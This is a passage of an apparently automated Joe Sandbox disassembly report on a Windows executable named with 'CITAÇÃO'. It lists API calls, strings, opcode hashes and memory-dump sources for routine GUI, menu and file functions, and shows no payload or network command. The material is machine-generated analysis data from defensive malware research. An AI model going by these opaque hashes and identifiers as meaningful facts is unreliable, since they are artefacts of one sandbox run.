                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                      • String ID:
                                                      • API String ID: 2054058615-0
                                                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window
                                                      • String ID: 0
                                                      • API String ID: 2353593579-4108050209
                                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                      APIs
                                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                      • String ID:
                                                      • API String ID: 1744303182-0
                                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                      • __mtterm.LIBCMT ref: 00417C34
                                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                      • __init_pointers.LIBCMT ref: 00417CE6
                                                      • __calloc_crt.LIBCMT ref: 00417D54
                                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                      • API String ID: 4163708885-3819984048
                                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll$IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2485277191-404129466
                                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                      APIs
                                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                                      • GetDesktopWindow.USER32 ref: 0045476F
                                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00464B28
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                      • _wcslen.LIBCMT ref: 00464C28
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                      • _wcslen.LIBCMT ref: 00464CBA
                                                      • _wcslen.LIBCMT ref: 00464CD0
                                                      • _wcslen.LIBCMT ref: 00464CEF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Directory$CurrentSystem
                                                      • String ID: D
                                                      • API String ID: 1914653954-2746444292
                                                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                      APIs
                                                      • _wcsncpy.LIBCMT ref: 0045CE39
                                                      • __wsplitpath.LIBCMT ref: 0045CE78
                                                      • _wcscat.LIBCMT ref: 0045CE8B
                                                      • _wcscat.LIBCMT ref: 0045CE9E
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                      • _wcscpy.LIBCMT ref: 0045CF61
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                      • String ID: *.*
                                                      • API String ID: 1153243558-438819550
                                                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsicoll
                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                      • API String ID: 3832890014-4202584635
                                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                      APIs
                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                      • GetFocus.USER32 ref: 0046A0DD
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                      Strings
                                                      Similarity
                                                      • API ID: MessagePost$CtrlFocus
                                                      • String ID: 0
                                                      • API String ID: 1534620443-4108050209
                                                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004558E3
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$CreateDestroy
                                                      • String ID: ,$tooltips_class32
                                                      • API String ID: 1109047481-3856767331
                                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 1441871840-4108050209
                                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                      • __swprintf.LIBCMT ref: 00460915
                                                      • __swprintf.LIBCMT ref: 0046092D
                                                      • _wprintf.LIBCMT ref: 004609E1
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 3631882475-2268648507
                                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                      • SendMessageW.USER32 ref: 00471740
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                      • SendMessageW.USER32 ref: 0047184F
                                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                      Similarity
                                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                      • String ID:
                                                      • API String ID: 4116747274-0
                                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                      • _wcslen.LIBCMT ref: 00461683
                                                      • __swprintf.LIBCMT ref: 00461721
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                      • GetDlgCtrlID.USER32(?), ref: 00461869
                                                      • GetWindowRect.USER32(?,?), ref: 004618A4
                                                      • GetParent.USER32(?), ref: 004618C3
                                                      • ScreenToClient.USER32(00000000), ref: 004618CA
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 1899580136-679674701
                                                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                      Strings
                                                      Similarity
                                                      • API ID: InfoItemMenu$Sleep
                                                      • String ID: 0
                                                      • API String ID: 1196289194-4108050209
                                                      • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                      • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0043143E
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                      Strings
                                                      Similarity
                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                      • String ID: (
                                                      • API String ID: 3300687185-3887548279
                                                      APIs
